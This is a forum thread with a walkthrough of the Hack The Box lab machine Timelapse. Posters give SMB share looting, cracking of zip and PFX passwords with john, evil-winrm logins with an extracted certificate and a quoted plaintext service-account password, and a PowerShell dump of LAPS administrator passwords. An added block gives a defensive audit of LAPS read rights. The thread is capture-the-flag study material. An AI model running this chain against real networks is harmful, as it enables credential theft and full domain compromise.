HTB - Timelapse Discussion
User: Port scan shows a handful of ports - 139, 445 and 5986 are of interest.
[code]smbclient -L [/code] for list of shares. Access "Shares"
[code]smbclient \\\\ \\Shares[/code]
Download the zip in the Dev directory
[code]cd Dev
get winrm_backup.zip[/code]
Locally get it hash friendly with zip2john and crack with rockyou.
[code]zip2john winrm_backup.zip > winrm.hash
john winrm.hash --wordlist=/usr/share/wordlists/rockyou.txt[/code]
Inside is a certificate that also requires a password - again convert, this time with pfx2john. Rockyou has the password again.
[code]pfx2john legacyy_dev_auth.pfx > pfx.hash
john pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt[/code]
Use openssl to extract the cert and the private key
[code]openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.key
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pfx.crt[/code]
Get a session with evil-winrm
[code]evil-winrm -i -c ./pfx.crt -k ./priv.key -p -u -S[/code]
Reply
In case anyone else gets the same issue: psexec.py didn't work for me, but wmiexec.py did.
Reply
I don't get the last part. I have dumped the LDAP with BloodHound, but I can't use secretsdump.py with svc_deploy and I can't log in with the creds for svc_deploy with either psexec or wmi.
Reply
(March 28, 2022, 01:54 PM)br_7801 Wrote: I don't get the last part. I have dumped the LDAP with BloodHound, but I can't use secretsdump.py with svc_deploy and I can't log in with the creds for svc_deploy with either psexec or wmi.

Use laps.py instead of secretsdump.py. Worked for me.
Reply
Root part:
evil-winrm -i 10.10.11.152 -c ./pfx.crt -k ./priv.key -p -u -S

# get password for svc_deploy
type C:\Users\legacyy\appdata\roaming\microsoft\windows\powershell\psreadline\consolehost_history.txt

# get evil-winrm with svc_deploy
evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

# LAPS password dump powershell
$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

# get evil-winrm with Administrator password from LAPS
evil-winrm -i 10.10.11.152 -u Administrator -p 'XXXXXXXXX' -S

# get root.txt
PS C:\Users\TRX\Desktop> type root.txt

PS:
Rep if u like it =)
I will help you...
Reply
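The LAPS dump in the post above only works because the svc_deploy account is allowed to read the confidential ms-Mcs-AdmPwd attribute. As an added example that is not from this thread or from any of its posters, the following PowerShell audits, from the defender's side, which principals hold the CONTROL_ACCESS (ExtendedRight) permission on that attribute across computer objects; it assumes the RSAT ActiveDirectory module in a domain-joined session, and the function name Get-LapsReaders is chosen here.

```powershell
# Added audit example (not from the thread): list who can read LAPS passwords.
# Reading a confidential attribute such as ms-Mcs-AdmPwd needs CONTROL_ACCESS
# (ExtendedRight) either scoped to that attribute's GUID or to all extended rights.
Import-Module ActiveDirectory

function Get-LapsReaders {
    param([string]$SearchBase = (Get-ADDomain).DistinguishedName)

    # schemaIDGUID of ms-Mcs-AdmPwd is generated per forest, so look it up
    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNC -Filter "name -eq 'ms-Mcs-AdmPwd'" -Properties schemaIDGUID
    if (-not $attr) { throw 'ms-Mcs-AdmPwd not in schema: legacy LAPS is not installed here.' }
    $admPwdGuid = [guid]$attr.schemaIDGUID

    foreach ($computer in Get-ADComputer -Filter * -SearchBase $SearchBase) {
        $acl = Get-Acl -Path ("AD:\" + $computer.DistinguishedName)
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # GenericAll also carries the ExtendedRight bit, so full-control grants show up too
            $hasControlAccess = $ace.ActiveDirectoryRights.HasFlag([System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight)
            # ObjectType equal to the attribute GUID -> scoped to ms-Mcs-AdmPwd;
            # empty GUID -> all extended rights, which covers it as well
            $coversAttr = ($ace.ObjectType -eq $admPwdGuid) -or ($ace.ObjectType -eq [guid]::Empty)
            if ($hasControlAccess -and $coversAttr) {
                [pscustomobject]@{
                    Computer  = $computer.Name
                    Principal = $ace.IdentityReference.Value
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

# Report anything beyond the principals you expect; a service account such as
# svc_deploy showing up here is exactly the exposure the post above exploits.
Get-LapsReaders |
    Where-Object { $_.Principal -notmatch 'Domain Admins|Enterprise Admins|NT AUTHORITY\\SYSTEM' } |
    Sort-Object Principal, Computer |
    Format-Table -AutoSize
```

Run it as a user allowed to read computer-object ACLs; inherited entries usually point at an OU-level grant, so fix the OU rather than each computer.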
Hi everybody. Why does this command not work:
 evil-winrm -i 10.10.11.152 -c ./pfx.crt -k ./priv.key -p -u -S 
? Do I need a username? Thanks.
Reply
(March 29, 2022, 03:10 PM)orangutang Wrote: Hi everybody. Why does this command not work:
 evil-winrm -i 10.10.11.152 -c ./pfx.crt -k ./priv.key -p -u -S 

? Do I need a username? Thanks.


This is the client certificate.

If you export the key into the priv.key file without the passphrase (via openssl), it works ;)
Reply
Hey guys, I need some help.
When I use the openssl command to get the .crt and .key, it always asks me for a PEM pass phrase. What is that? And how did you guys get that?

┌──(root㉿kali)-[/home/…/Downloads/htb/timelapse/winrm_backup]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out pfx.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
Reply
If you are using an Arch GNU/Linux-based distro like BlackArch or Arch itself, you may need to modify pfx2john because that version still requires Python 2.x; then it outputs the hash so john can actually load it. If not, you will get a simple "unable to load any hash" output or similar.
Reply
(April 4, 2022, 01:24 AM)rebelon Wrote: If you are using an Arch GNU/Linux-based distro like BlackArch or Arch itself, you may need to modify pfx2john because that version still requires Python 2.x; then it outputs the hash so john can actually load it. If not, you will get a simple "unable to load any hash" output or similar.


Found out that pfx2john is a python2 script, works just fine if you run it that way instead of with python3. Spent a couple of hours on this issue.
Reply